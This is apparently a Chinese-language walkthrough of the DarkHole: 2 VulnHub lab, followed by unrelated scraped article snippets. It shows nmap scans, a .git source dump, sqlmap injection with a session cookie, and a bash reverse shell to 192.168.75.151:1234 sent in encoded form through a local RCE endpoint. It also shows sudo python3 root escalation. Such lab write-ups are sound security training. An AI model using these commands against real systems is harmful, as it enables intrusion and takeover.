[vulnhub] DarkHole: 2

https://www.vulnhub.com/entry/darkhole-2,740/

端口扫描主机发现

  1. 探测存活主机,185是靶机

    # nmap -sP 192.168.75.0/24                 
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-08 18:02 CST
    Nmap scan report for 192.168.75.1
    Host is up (0.00036s latency).
    MAC Address: 00:50:56:C0:00:08 (VMware)
    Nmap scan report for 192.168.75.2
    Host is up (0.00030s latency).
    MAC Address: 00:50:56:FB:CA:45 (VMware)
    Nmap scan report for 192.168.75.185
    Host is up (0.00028s latency).
    MAC Address: 00:0C:29:1E:D3:AD (VMware)
    Nmap scan report for 192.168.75.254
    Host is up (0.00033s latency).
    MAC Address: 00:50:56:FE:CA:7A (VMware)
    Nmap scan report for 192.168.75.151
    
  2. 探测主机所有开放端口

    nmap -sT -min-rate 10000 -p- 192.168.75.185
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-08 18:03 CST
    Nmap scan report for 192.168.75.185
    Host is up (0.00040s latency).
    Not shown: 65533 closed tcp ports (conn-refused)
    PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    MAC Address: 00:0C:29:1E:D3:AD (VMware)
    
  3. 探测服务版本以及系统版本

    nmap -sV -sT -O -p 80,22 192.168.75.185    
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-08 18:04 CST
    Nmap scan report for 192.168.75.185
    Host is up (0.00067s latency).PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
    MAC Address: 00:0C:29:1E:D3:AD (VMware)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 4.X|5.X
    OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
    OS details: Linux 4.15 - 5.8
    Network Distance: 1 hop
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
  4. 扫描漏洞

    nmap -script=vuln -p 80,22 192.168.75.185
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-08 18:05 CST
    Nmap scan report for 192.168.75.185
    Host is up (0.00078s latency).PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    | http-git: 
    |   192.168.75.185:80/.git/
    |     Git repository found!
    |     Repository description: Unnamed repository; edit this file 'description' to name the...
    |_    Last commit message: i changed login.php file for more secure 
    |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
    | http-csrf: 
    | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.75.185
    |   Found the following possible CSRF vulnerabilities: 
    |     
    |     Path: http://192.168.75.185:80/login.php
    |     Form id: email
    |_    Form action: 
    | http-cookie-flags: 
    |   /: 
    |     PHPSESSID: 
    |       httponly flag not set
    |   /login.php: 
    |     PHPSESSID: 
    |_      httponly flag not set
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    | http-enum: 
    |   /login.php: Possible admin folder
    |   /.git/HEAD: Git folder
    |   /config/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
    |   /js/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
    |_  /style/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
    

    找到.git ,可能存在源码泄露

web渗透

  1. 访问主页,存在登陆页面连接

    在这里插入图片描述

  2. 扫描目录

    dirsearch -u http://192.168.75.185 -x 403,404
    //
    [18:11:11] 301 -  313B  - /js  ->  http://192.168.75.185/js/                                             
    [18:11:13] 301 -  315B  - /.git  ->  http://192.168.75.185/.git/                                         
    [18:11:13] 200 -  600B  - /.git/                                                                         
    [18:11:13] 200 -   41B  - /.git/COMMIT_EDITMSG      
    [18:11:13] 200 -   73B  - /.git/description                                                              
    [18:11:13] 200 -   23B  - /.git/HEAD                
    [18:11:13] 200 -  674B  - /.git/hooks/              
    [18:11:13] 200 -  130B  - /.git/config                                                                   
    [18:11:13] 200 -    1KB - /.git/index                                                                    
    [18:11:13] 200 -  460B  - /.git/info/                                                                    
    [18:11:13] 200 -  240B  - /.git/info/exclude        
    [18:11:13] 200 -  485B  - /.git/logs/                                                                    
    [18:11:13] 200 -  554B  - /.git/logs/HEAD           
    [18:11:13] 301 -  331B  - /.git/logs/refs/heads  ->  http://192.168.75.185/.git/logs/refs/heads/
    [18:11:13] 200 -  554B  - /.git/logs/refs/heads/master                                                   
    [18:11:13] 200 -  669B  - /.git/objects/                                                                 
    [18:11:13] 301 -  325B  - /.git/logs/refs  ->  http://192.168.75.185/.git/logs/refs/                     
    [18:11:13] 200 -   41B  - /.git/refs/heads/master                                                        
    [18:11:13] 301 -  326B  - /.git/refs/heads  ->  http://192.168.75.185/.git/refs/heads/                   
    [18:11:13] 301 -  325B  - /.git/refs/tags  ->  http://192.168.75.185/.git/refs/tags/                     
    [18:11:13] 200 -  465B  - /.git/refs/               
    [18:11:13] 200 -  510B  - /.idea/                                                                        
    [18:11:13] 301 -  316B  - /.idea  ->  http://192.168.75.185/.idea/                                       
    [18:11:14] 200 -  192B  - /.idea/modules.xml                                                             
    [18:11:14] 200 -  926B  - /.idea/workspace.xml                                                           
    [18:11:32] 301 -  317B  - /config  ->  http://192.168.75.185/config/                                     
    [18:11:33] 200 -  457B  - /config/                                                                       
    [18:11:34] 200 -   11B  - /dashboard.php                                                                 
    [18:11:43] 200 -  456B  - /js/                                                                           
    [18:11:45] 200 -  484B  - /login.php                                                                     
    [18:11:46] 302 -    0B  - /logout.php  ->  index.php                                                     
    [18:12:03] 301 -  316B  - /style  ->  http://192.168.75.185/style/
    
    • 清一色的.git 可以尝试有没有.git源码泄露
    • config/ 应该是配置文件
  3. 测试是否存在源码泄露

    https://www.freebuf.com/articles/web/346607.html

    因为我们找到了.git ,所以我们要针对git

    • 访问/.git/config 存在该目录,存在源码泄露漏洞

      [core]repositoryformatversion = 0filemode = falsebare = falselogallrefupdates = truesymlinks = falseignorecase = true
      
    • 使用工具 git-dumper

      https://github.com/arthaud/git-dumper

      使用pip install git-dumper 安装

      git-dumper http://192.168.75.185/.git/ ./185
      

      将所有源码文件下载下来了,下载到当前目录的185文件夹里

      ls -al ./185
      //
      drwxr-xr-x 7 root root 4096 11901:25 .
      drwxr-xr-x 4 root root 4096 11901:41 ..
      drwxr-xr-x 2 root root 4096 11901:25 config
      -rw-r--r-- 1 root root 5578 11901:25 dashboard.php
      drwxr-xr-x 7 root root 4096 11901:25 .git
      drwxr-xr-x 2 root root 4096 11901:25 .idea
      -rw-r--r-- 1 root root 1094 11901:25 index.php
      drwxr-xr-x 2 root root 4096 11901:25 js
      -rw-r--r-- 1 root root 1493 11901:25 login.php
      -rw-r--r-- 1 root root  179 11901:25 logout.php
      drwxr-xr-x 2 root root 4096 11901:25 style
      

代码审计

上面已将源码文件下载了,现在开始要代码审计

  1. config.php文件,是数据库配置文件,用户名为root但是密码为

    <?php
    $connect = new mysqli("localhost","root","","darkhole_2");
    
  2. login.php

    <?php                                                                                                                                                                                                             
    session_start();                                                                                                                                                                                                  
    require 'config/config.php';                                                                                                                                                                                      
    if($_SERVER['REQUEST_METHOD'] == 'POST'){                                                                                                                                                                         $email = mysqli_real_escape_string($connect,htmlspecialchars($_POST['email']));                                                                                                                               $pass = mysqli_real_escape_string($connect,htmlspecialchars($_POST['password']));                                                                                                                             $check = $connect->query("select * from users where email='$email' and password='$pass' and id=1");                                                                                                           if($check->num_rows){$_SESSION['userid'] = 1;header("location:dashboard.php");die();}
    }
    ?>
    

    应该是可以绕过的?但是我没有成功

  3. 进入185文件夹查看日志(因为文件夹还留着.git ,所以可以使用git命令)

    git log
    //                                     
    commit 0f1d821f48a9cf662f285457a5ce9af6b9feb2c4 (HEAD -> master)
    Author: Jehad Alqurashi <anmar-v7@hotmail.com>
    Date:   Mon Aug 30 13:14:32 2021 +0300i changed login.php file for more securecommit a4d900a8d85e8938d3601f3cef113ee293028e10
    Author: Jehad Alqurashi <anmar-v7@hotmail.com>
    Date:   Mon Aug 30 13:06:20 2021 +0300I added login.php file with default credentialscommit aa2a5f3aa15bb402f2b90a07d86af57436d64917
    Author: Jehad Alqurashi <anmar-v7@hotmail.com>
    Date:   Mon Aug 30 13:02:44 2021 +0300
    

    出现三次提交以及作者时间等

  4. 对比三次提交

    git diff #获得当前目录上次提交和本地索引的差距,也就是你在什么地方修改了代码.

    # git diff 0f1d821f48a9cf662f285457a5ce9af6b9feb2c4                                                                                                                     
    # git diff a4d900a8d85e8938d3601f3cef113ee293028e10diff --git a/login.php b/login.php
    index 8a0ff67..0904b19 100644
    --- a/login.php
    +++ b/login.php
    @@ -2,7 +2,10 @@session_start();require 'config/config.php';if($_SERVER['REQUEST_METHOD'] == 'POST'){
    -    if($_POST['email'] == "lush@admin.com" && $_POST['password'] == "321"){
    +    $email = mysqli_real_escape_string($connect,htmlspecialchars($_POST['email']));
    +    $pass = mysqli_real_escape_string($connect,htmlspecialchars($_POST['password']));
    +    $check = $connect->query("select * from users where email='$email' and password='$pass' and id=1");
    +    if($check->num_rows){$_SESSION['userid'] = 1;header("location:dashboard.php");die();

    可以看到 - if($_POST['email'] == "lush@admin.com" && $_POST['password'] == "321")

    出现了邮箱以及密码,可以尝试登陆后台

  5. 使用的得到账号密码登录后台,成功进入

利用后台

  1. 使用的得到账号密码登录后台,成功进入后台

    在这里插入图片描述

  2. url/dashboard.php?id=1 ,像是存在sql注入,可以尝试下

    /dashboard.php?id=1' # 页面空白
    /dashboard.php?id=1'--+ # 成功闭合,存在注入
    

    就不使用手工注入了,直接上sqlmap ,记得要想拿到cookie ,不然没有登陆状态

    sqlmap -u http://192.168.75.185/dashboard.php?id=1 --cookie PHPSESSID=n22sg8e16sjbgs2c7g7kffofmf -batch
    

    爆出两张表 users 以及sshssh应该是能使用 ssh登录的用户,两张表的数据我们都dump

    # users
    +----+----------------+-------------------------------------------+----------+-----------------------------+----------------+
    | id | email          | address                                   | password | username                    | contact_number |
    +----+----------------+-------------------------------------------+----------+-----------------------------+----------------+
    | 1  | lush@admin.com |  Street, Pincode, Province/State, Country | 321      | Jehad Alqurashiasddasdasdas | 1              |
    +----+----------------+-------------------------------------------+----------+-----------------------------+----------------+
    # ssh
    +----+------+--------+
    | id | pass | user   |
    +----+------+--------+
    | 1  | fool | jehad  |
    +----+------+--------+
    
  3. 我们拿ssh表的用户去登陆下

提权 - jehad用户

  1. 我们拿ssh表的用户去登陆下

    ssh jehad@192.168.75.185                
    jehad@darkhole:~$ 
    

    获得shell!!!

  2. 查看权限

    jehad@darkhole:~$ whoami
    jehad
    jehad@darkhole:~$ id
    uid=1001(jehad) gid=1001(jehad) groups=1001(jehad)
    jehad@darkhole:~$ uname -a
    Linux darkhole 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
    
  3. 寻找敏感文件

    • /home/losy 目录下存在user.txtflag文件

      ehad@darkhole:/home/losy$ cat user.txt
      DarkHole{'This_is_the_life_man_better_than_a_cruise'}
      
    • 寻找SUID文件

      jehad@darkhole:/home/losy$ find / -perm -u=s -type f 2>/dev/null                                                                                                                                   02:06:46 [3/65]
      /usr/bin/sudo                                                                                                                                                                                                     
      /usr/bin/passwd                                                                                                                                                                                                   
      /usr/bin/chfn                                                                                                                                                                                                     
      /usr/bin/chsh
      /usr/bin/fusermount
      /usr/bin/gpasswd
      /usr/bin/pkexec
      /usr/bin/newgrp
      /usr/bin/umount
      /usr/bin/mount
      /usr/bin/su
      /usr/bin/at
      /usr/lib/openssh/ssh-keysign
      /usr/lib/dbus-1.0/dbus-daemon-launch-helper
      /usr/lib/policykit-1/polkit-agent-helper-1
      /usr/lib/eject/dmcrypt-get-device
      /usr/lib/snapd/snap-confine
      

      想尝试snapd 提权的,但是版本对不上

  4. 查看bash历史记录

    jehad@darkhole:~$ cat .bash_history 
    

    在这里插入图片描述

    发现执行了很多 curl "http://127.0.0.1:9999/?cmd=<命令>" 之类的,估计9999端口下是一个能进行RCE的页面

  5. 我们也尝试执行下

    • 先试试id ,发现是losy的权限

      jehad@darkhole:~$ curl http://127.0.0.1:9999/?cmd=id
      Parameter GET['cmd']uid=1002(losy) gid=1002(losy) groups=1002(losy)
      
  6. 获得losy用户的权限

    • 跟着反弹shell命令

      因为靶机的nc没有-e参数,只能通过其他方式来反弹shell

      # 通过shell
      bash -c 'bash -i >& /dev/tcp/192.168.75.151/1234 0>&1'
      
    • 将其进行URl编码

      bash+-c+%27bash+-i+%3e%26+%2fdev%2ftcp%2f192.168.75.151%2f1234+0%3e%261%27
      
    • 构建命令

      curl "http://127.0.0.1:9999/?cmd=bash+-c+%27bash+-i+%3e%26+%2fdev%2ftcp%2f192.168.75.151%2f1234+0%3e%261%27"
      
    • kali 开启监听,执行命令

      nc -lvp 1234
      listening on [any] 1234 ...
      192.168.75.185: inverse host lookup failed: Unknown host
      connect to [192.168.75.151] from (UNKNOWN) [192.168.75.185] 33342
      bash: cannot set terminal process group (1215): Inappropriate ioctl for device
      bash: no job control in this shell
      losy@darkhole:/opt/web$ 
      

      获得losyshell!!!

提权 - losy用户

  1. 和之前一样,我们先查看bash历史记录

    在这里插入图片描述

    可以找到losy的密码为gang

  2. 进行ssh登录,能过得交互性更好的shell

  3. 查看权限

    • SUDO ,可以以root权限执行python3 ,可以提权了

      ```python
      losy@darkhole:~$ sudo -l
      [sudo] password for losy: 
      Matching Defaults entries for losy on darkhole:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser losy may run the following commands on darkhole:(root) /usr/bin/python3
      
      
      
  4. 使用python3提权,使用python生成虚拟终端即可

    losy@darkhole:~$ sudo /usr/bin/python3 -c "import pty;pty.spawn('/bin/sh')"
    # whoami
    root
    

    获得root!!!!

  5. 读取flag文件

    # cat root.txt
    DarkHole{'Legend'}
    

总结

.git的使用,以及git diff;以及bash_history也可能存在敏感内容;

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/468439.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【温度表达转化】

【温度表达转化】 C语言代码C代码Java代码Python代码 &#x1f490;The Begin&#x1f490;点点关注&#xff0c;收藏不迷路&#x1f490; 利用公式 C5∗(F−32)/9 &#xff08;其中C表示摄氏温度&#xff0c;F表示华氏温度&#xff09; 进行计算转化。 输出 输出一行&#x…

【Promise】JS 异步之宏队列与微队列

文章目录 1 原理图2 说明3 相关面试题3.1 面试题13.2 面试题23.3 面试题33.4 面试题4 1 原理图 2 说明 JS 中用来存储待执行回调函数的队列包含 2 个不同特定的队列&#xff1a;宏队列和微队列。宏队列&#xff1a;用来保存待执行的宏任务(回调)&#xff0c;比如&#xff1a;定…

【Linux】Linux入门实操——vim、目录结构、远程登录、重启注销

一、Linux 概述 1. 应用领域 服务器领域 linux在服务器领域是最强的&#xff0c;因为它免费、开源、稳定。 嵌入式领域 它的内核最小可以达到几百KB, 可根据需求对软件剪裁&#xff0c;近些年在嵌入式领域得到了很大的应用。 主要应用&#xff1a;机顶盒、数字电视、网络…

ubuntu下aarch64-linux-gnu(交叉编译) gdb/gdbserver(二)

ubuntu下aarch64-linux-gnu(交叉编译) gdb/gdbserver&#xff08;二&#xff09; 本教程作为gdb/gdbserver编译安装教程的一个补充&#xff0c;教会大家如何使用gdb/gdbserver进行远程调试。 如上图所示&#xff0c;我们需要将编译后的gdbserver上传至目标设备&#xff0c;其上…

Flutter错误: uses-sdk:minSdkVersion 16 cannot be smaller than version 21 declared

前言 今天要做蓝牙通信的功能&#xff0c;我使用了flutter_reactive_ble这个库&#xff0c;但是在运行的时候发现一下错误 Launching lib/main.dart on AQM AL10 in debug mode... /Users/macbook/Desktop/test/flutter/my_app/android/app/src/debug/AndroidManifest.xml Err…

c中柔性数组

c99中&#xff0c;结构中最后一个元素允许是未知大小的数组&#xff0c;这就叫柔性数组成员。 柔性数组的特点 1.结构中柔性数组前必须至少有一个其他成员 2.sizeof返回的这种结构大小不包括柔性数组的内存 3.包含柔性数组成员的结构用malloc函数进行动态分配&#xff0c;并…

WPS 默认模板修改

重装系统把word自定义样式搞没了&#xff0c;安装office时间太长&#xff0c;转战wps 解决方案 打开wps 点击【新建】word空白文档 设置修改你自己的样式 点击文件–另存为–Microsoft Word 带宏的模板文件&#xff08;*.dotm&#xff09; 另存路径为如下&#xff1a; 查…

Ubuntu24.04网络异常与应对方案记录

PS: 参加过408改卷的ZJU ghsongzju.edu.cn 开启嘲讽: 你们知道408有多简单吗&#xff0c;操作系统真实水平自己知道就行&#xff5e;&#xff5e; Requested credits of master in UWSC30&#xff0c;in ZJU24&#xff0c;domestic master is too simple ubuntu安全软件 在 U…

[C++11] Lambda 表达式

lambda 表达式&#xff08;Lambda Expressions&#xff09;作为一种匿名函数&#xff0c;为开发者提供了简洁、灵活的函数定义方式。相比传统的函数指针和仿函数&#xff0c;lambda 表达式在简化代码结构、提升代码可读性和编程效率方面表现出色。 Lambda 表达式的基本语法 在…

Docker平台搭建方法

Docker平台搭建方法 1.1在VMware中创建两个虚拟机&#xff0c;只需要1个网卡&#xff0c;连接192.168.200.0网络。 虚拟机分配2个CPU,2G内存&#xff0c;60G硬盘&#xff0c;主机名分别为server和client,IP地址分别为192.168.200.137和192.168.200.138。server节点还兼做regis…

【学习笔记】Kylin-Desktop-V10-SP1 麒麟系统知识4——设备设置

提示&#xff1a;学习麒麟Kylin-Desktop-V10-SP1系统设备设置相关知识&#xff0c;包含设备设置进入方法、配置打印机、设置鼠标、键盘相关参数&#xff08;包含输入法的配置&#xff09;、以及管理快捷键组合、和多屏协同相关配置 一、前期准备 成功安装麒麟系统&#xff08…

Linux应用项目之量产工具(一)——显示系统

目录 前言 项目特点及介绍 ① 简单易用 ② 软件可配置、易扩展 ③ 纯 C 语言编程 软件总框架 显示系统 1.数据结构抽象 disp_manager.h 2.Framebuffer编程 framebuffer.c 3.显示管理 disp_manager.c 4.单元测试 disp_test.c 顶层目录Makefile 顶层目录Makefil…

企微SCRM价格解析及其性价比分析

内容概要 在如今的数字化时代&#xff0c;企业对于客户关系管理的需求日益增长&#xff0c;而企微SCRM&#xff08;Social Customer Relationship Management&#xff09;作为一款新兴的客户管理工具&#xff0c;正好满足了这一需求。本文旨在为大家深入解析企微SCRM的价格体系…

leetcode92:反转链表||

给你单链表的头指针 head 和两个整数 left 和 right &#xff0c;其中 left < right 。请你反转从位置 left 到位置 right 的链表节点&#xff0c;返回 反转后的链表 。 示例 1&#xff1a; 输入&#xff1a;head [1,2,3,4,5], left 2, right 4 输出&#xff1a;[1,4,3,2…

Python——数列1/2,2/3,3/4,···,n/(n+1)···的一般项为Xn=n/(n+1),当n—>∞时,判断数列{Xn}是否收敛

没注释的源代码 from sympy import * n symbols(n) s n/(n1) print(数列的极限为&#xff1a;,limit(s,n,oo))

多线程的创建方式以及及Thread类详解

目录 一.线程的创建方法&#xff1a;&#xff08;重点&#xff09; 一&#xff1a;继承Thread类 写法一&#xff1a;正常写法 写法二&#xff1a;匿名内部类 二.实现Runnable接口 写法一&#xff1a;正常写法 写法二&#xff1a;匿名内部类 三. 实现 Callable 接口 ​…

成功解决WSL2上的Ubuntu22.04执行sudo apt-get update指令报错问题

问题&#xff1a;输入sudo apt-get update指令会显示如下报错 问题所在&#xff1a;Temporary failure in name resolution 显然是系统无法解析域名。这可能是 DNS 配置问题。 解决方案&#xff1a; 临时修改 DNS 配置 尝试手动修改 /etc/resolv.conf 文件来使用公共 DNS 服务…

【英特尔IA-32架构软件开发者开发手册第3卷:系统编程指南】2001年版翻译,2-19

文件下载与邀请翻译者 学习英特尔开发手册&#xff0c;最好手里这个手册文件。原版是PDF文件。点击下方链接了解下载方法。 讲解下载英特尔开发手册的文章 翻译英特尔开发手册&#xff0c;会是一件耗时费力的工作。如果有愿意和我一起来做这件事的&#xff0c;那么&#xff…

ffmpeg 视频滤镜:屏蔽边框杂色- fillborders

滤镜描述 fillborders 官网链接 > FFmpeg Filters Documentation fillborders滤镜有几种方式帮你屏蔽边框的杂色、不好的图案。 滤镜使用 参数 left <int> ..FV.....T. set the left fill border (from 0 to INT_MAX) (default 0)right …

Unity性能优化 -- 性能分析工具

Stats窗口Profiler窗口Memory Profiler其他性能分析工具&#xff08;Physica Debugger 窗口&#xff0c;Import Activity 窗口&#xff0c;Code Coverage 窗口&#xff0c;Profile Analyzer 窗口&#xff0c;IMGUI Debugger 窗口&#xff09; Stats 统级数据窗口 game窗口 可…